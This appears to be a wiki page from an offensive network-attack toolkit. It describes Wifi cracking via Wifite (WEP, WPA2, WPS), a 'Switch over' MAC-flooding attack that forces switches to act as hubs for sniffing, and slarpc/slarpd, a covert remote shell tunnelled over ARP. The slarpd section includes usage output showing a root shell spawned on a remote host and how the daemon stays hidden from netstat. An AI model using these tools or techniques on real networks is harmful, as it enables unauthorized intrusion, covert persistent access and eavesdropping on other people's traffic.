-
Notifications
You must be signed in to change notification settings - Fork 322
Parameter
Perform parameter cracking to gain access to a network. AP cracking is harnessed by Wifite. Included are WEP Crack, WPA2 Crack, WPS Crack, Router pwn, slarpc/d, and switch over.
slarpc is a remote shell that works over the ARP protocol. Traffic can also be encrypted using a shared key and RC4. The slarpd daemon must be initialized on the remote host before using, and will run silently in the background. Because it does not bind to a port, it won't show up after a netstat:
root@127:~# python slarpd.py usage: slarpd.py [-h] [-r REMOTE] [-P] [-a NET] [-k] optional arguments: -h, --help show this help message and exit -r REMOTE remote address -P encryption flag -a NET network adapter -k kill a running daemon root@127:~# python slarpd.py -r 192.168.1.42 -P [!] Encryption password: daemon running with adapter eth0, going into hibernate mode... root@127:~# netstat -vantp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:8182 0.0.0.0:* LISTEN 1541/firefox tcp 0 0 127.0.0.1:7337 0.0.0.0:* LISTEN 1014/postgres.bin tcp6 0 0 ::1:7337 :::* LISTEN 1014/postgres.bin root@127:~#
On the client side:
> 5 3 [!] The slarpd daemon should be running on the remote host! [!] Remote host: 192.168.1.74 [!] Encrypt traffic? [!] Enter encryption password: [!] Traffic encrypted. [!] Spawning remote shell to 192.168.1.74 # whoami root # uname -a Linux 127.0.0.1 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux #
Because a shared key is used, you can make the connection at any time without maintaining a session. Typing "slarp-shutdown" will silently kill the remote daemon. Since the slarpd daemon is running in userland, there will be excessive ARP packets if viewed through Wireshark or tcpdump. This is because the kernel will respond to the ARP-REQUEST as well. Running tcpdump:
root@127:~# tcpdump "arp" tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes 17:39:14.898393 ARP, Request who-has 127 tell 192.168.1.42, length 46 17:39:14.898430 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 28 17:39:14.916212 ARP, Request who-has 127 tell 192.168.1.42, length 46 17:39:14.916234 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 28 17:39:14.920415 ARP, Request who-has www.asusnetwork.net tell 127, length 28 17:39:14.920918 ARP, Reply www.asusnetwork.net is-at f4:6d:04:5f:2c:46 (oui Unknown), length 50 17:39:14.922837 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 36 17:39:24.916784 ARP, Request who-has 127 tell www.asusnetwork.net, length 50 17:39:24.916807 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 28
And with a more verbose flag:
root@127:~# tcpdump -A "arp" tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes 17:40:54.113494 ARP, Request who-has 127 tell 192.168.1.42, length 46 ..........'-zm...*.........JO8u+RC4+cw==...... 17:40:54.113533 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 28 ..........'|.....J..'-zm...* 17:40:54.121894 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 36 ..........'|.....J..'-zm...*eNO5Xw==
Although the command is encrypted, any proactive administrator sniffing the network will notice extra data tagged onto each ARP packet.
Switch over is a module that can be used to flood a switch with spoofed ARP packets with randomized MAC source addresses. This should eventually fill up the ARP tables, and the switch will hopefully fail over as a hub, allowing you to sniff all the traffic.